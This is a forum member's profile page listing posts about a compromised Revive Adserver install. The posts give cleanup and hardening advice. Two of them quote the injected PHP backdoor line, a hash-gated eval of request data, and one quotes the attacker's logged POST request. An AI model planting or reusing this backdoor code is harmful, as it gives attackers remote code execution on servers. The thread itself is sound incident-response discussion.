Jump to content

tvvpmi

Approved members
  • Content Count

    14
  • Joined

  • Last visited

About tvvpmi

  • Rank
    Newbie

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Which kind of errors? A message saying "File permission errors detected."?
  2. If prepend/append zones are varchar(0), they can't insert code there for sure. Check if the code is inserted in prepend/append fields of the banners table. As I post before, if the injection is done using the same strategy, you can stop it making the file "plugins/bannerTypeText/oxText/genericText.delivery.php" read only. Another good measure is to disable PHP execution on delivery images folder.
  3. Yes. Timestamps has been changed as well. You can use linux commd "stat" to see the modification and change time stamps. Attacker is changing "modification time" to parent folder "modification time" so as not to raise suspicion This code is inserted via a POST call to fc.php. To avoid to be reinfected you can change write permisions on "plugins/bannerTypeText/oxText/genericText.delivery.php". Perhaps some revive developer can tell us, what is the function of fc.php (front controller) to decide if we can disable it or not.
  4. Hi @vinmhas, I was in the same situation. You should review your file: plugins/bannerTypeText/oxText/genericText.delivery.php Problably it has been modified, adding a line like this at the end: if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);} You have to remove it. Also you have to search in the "images folder", for some php script ... and remove it. Perhaps you can send it privately to @Ian vM Clean the prepend code of your zones ... via sql o through the revive backend. Search for iframes and javascript codes. Disable PHP execution on image folder or move image folder to "another place" as they are static files and serve them throught another subdomain. You don't need PHP for them
  5. Message sent directly to @Ian vM
  6. I have more info. I just have received another attack just now. I have the POST parameters the attacker is using. Some of admin is interested in receiving them?
  7. Like in @snaggy case, this line has been added at the end of genericText.delivery.php if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}
  8. Same here. From stat genericText.delivery.php 2018-12-22 08:51:50.724940460 +0100
  9. Last one 4.1.4 I have upgrade from prior version. But this instalation comes from an old instalation. 2.8 series I have modify the fc.php script to log post parameters. I'm waiting now for a new POST to check what we are receiving and to try reproduce the attack
  10. CONFIRMED the point of code injection un the prepend zones are the same @sunech has previously report [06/Jan/2019:12:22:53 +0100] "POST /www/delivery/fc.php?zoneid=0&script=bannerTypeText:oxText:genericText&Charset=UTF8&target=blank HTTP/1.1" 200 23 "https://google.com/serach?q=https://<adserver>/www/delivery&aqs=chrome.1.69i57j0j7&sourceid=chrome&ie=UTF-8" "AdsBot-Google (+http://www.google.com/adsbot.html)"
  11. The same problem here. I have access.log switched off, so I can't confirm how the injection os comming from. I have cleared all prepend code from zones table at DB, switch on logging and waiting for another injection wave.
  12. Yes. I know that. I have been using OpenX Source for a los time and before that phpadsnew, and now Revive Adserver. With new OpenX I want to mean that company. I don't know what software they are using in their services. Reading the link https://github.com/ampproject/amphtml/blob/master/ads/openx.md you can see that there is a parameter to set the host where the adserver is running. That makes me think that OpenX was the open source OpenX. Of course i have try it with my private versiĆ³n of OpenX and don't work. Inserting javascripts inside the AMP works. I have to try what happens when the page is cached at google amp cache
  13. Hi. It is not working because in AMP you can not include javascript code https://www.ampproject.org/docs/reference/amp-ad.html There is support from OpenX right now (https://github.com/ampproject/amphtml/blob/master/ads/openx.md) but I think it is the "new" openX. Not the revive ancestor
×
×
  • Create New...